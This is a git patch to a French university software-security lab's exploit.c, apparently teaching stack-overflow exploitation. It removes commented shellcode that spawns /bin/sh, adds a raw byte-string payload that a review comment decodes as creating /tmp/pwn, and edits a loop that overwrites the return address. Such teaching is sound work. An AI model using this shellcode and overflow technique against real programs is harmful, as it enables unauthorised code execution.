From b818407fd0fb2b67528f2c4db04e43dd353e17a3 Mon Sep 17 00:00:00 2001 From: Yorick Barbanneau Date: Thu, 30 Mar 2023 02:08:40 +0200 Subject: [PATCH] Integrate shellcode --- .../files/q3/exploit.c | 45 +++---------------- 1 file changed, 6 insertions(+), 39 deletions(-) diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c index 8895bbf..a06e163 100644 --- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c +++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c @@ -1,36 +1,8 @@ #include #include - unsigned char exploit[1024] = { - 0x90, 0x90, 0x90, 0x90, // A few nops for some margin - 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, - -#ifdef __x86_64__ - /* 64 bit version */ - 0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next - '/','b','i','n','/','s','h','\0', - 0x5f, // pop the address - 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, // execve system call - 0x6a, 0x00, // push NULL at the end of the array - 0x48, 0x89, 0xe2, // envp - 0x57, // push adress - 0x48, 0x89, 0xe6, // argv - 0x0f, 0x05, // system call! -#else - /* 32 bit version */ - 0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next - '/','b','i','n','/','s','h','\0', - 0x5b, // pop the adress - 0xb8, 0x0b, 0x00, 0x00, 0x00, // execve system call - 0x6a, 0x00, // push NULL at the end of the array - 0x89, 0xe2, // envp - 0x53, // push adress - 0x89, 0xe1, // argv - 0xcd, 0x80, // system call! -#endif +0xeb,0x24,0x48,0x31,0xff,0x5f,0x68,0xb6,0x01,0x00,0x00,0x48,0x31,0xf6,0x5e,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd7,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00 }; int main(void) { 
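Review bot: The new initializer for `exploit[]` is a single uncommented run of bytes, and the `#ifdef __x86_64__` / `#else` split of the old table is gone, so a reader of this course file can no longer audit what the payload does or tell which architecture it targets. Decoded by hand, the bytes look like x86-64 code that calls `creat("/tmp/pwn", 0666)` and then `exit(42)`; that is my reading of the opcodes and should be confirmed against the assembly it was generated from. A comment above the line would restore what the removed per-instruction comments gave, for example `/* x86-64 only: creat("/tmp/pwn", 0666); exit(42); generated from <ASM_SOURCE_FILE> */`. Because the REX prefixes and the `syscall` instruction make it 64-bit only, I would also add `#ifndef __x86_64__` / `#error "exploit.c payload is x86-64 only"` / `#endif` after the includes, so a 32-bit build fails loudly instead of producing a binary whose payload cannot run. `main` continues outside this hunk.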
@@ -41,21 +13,16 @@ int main(void) { fprintf(stderr,"Type the buf address printed by anodin\n"); scanf("%p", &ptr); - // Un peu de marge - ptr += 8; - // écraser l'adresse de retour for (i = 0; i < 8; i++) - exploit_ptr[64/sizeof(void*)+i] = ptr; - - for (i=0;i